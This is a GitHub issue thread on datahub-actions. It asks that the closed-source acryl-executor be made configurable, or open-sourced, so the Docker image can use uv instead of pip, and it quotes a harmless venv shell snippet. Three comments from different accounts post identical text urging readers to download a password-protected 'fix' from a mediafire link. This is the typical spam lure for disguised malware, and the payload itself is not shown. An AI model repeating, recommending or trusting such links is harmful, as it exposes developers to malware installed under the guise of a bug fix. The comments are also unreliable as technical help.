### ISSUE TITLE
Closed source acryl-executor prevents datahub-actions docker container from taking advantage of `uv`

### ISSUE THREAD

**Issue by collinarnett** [acryldata/datahub-actions#124]
## Problem

When attempting to make security updates to datahub-actions, the following issue was discovered:

 `datahub-ingestion-base` in the main datahub repository [uses `uv`](https://github.com/datahub-project/datahub/blob/ca4c436f66d072491216f03303cab967e5f146c8/docker/datahub-ingestion-base/Dockerfile#L58)  to install datahub-cli. `uv` is nice because it is [much faster](https://github.com/astral-sh/uv/blob/main/BENCHMARKS.md) than base `pip`. It would be nice if `datahub-actions` could similarly take advantage of `uv` however even if the Dockerfile that builds `datahub-actions` is modified, the python package `acryl-executor` (dependency of the `datahub-actions` python package) is hardcoded to use the system python installation to create virtual environments and manage dependencies. Here is the relevant snippet.
 
 ```bash
         if [ ! -d "$venv_dir" ]; then
            echo "venv doesn't exist.. minting.."
            python3 -m venv $venv_dir
            source "$venv_dir/bin/activate"
            pip install --upgrade pip wheel setuptools
        else
            source "$venv_dir/bin/activate"
            VENV_IS_REINSTALL=1
        fi
```

## Proposed Solution

Allow acryl-executor to be configurable with how virtual environments/dependencies are managed. Open sourcing `acryl-executor` would allow for community contributions. Eg. I could open a PR for this problem.

**Comment by uno-zero** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by enricozao** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by CoZmoTheGod** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
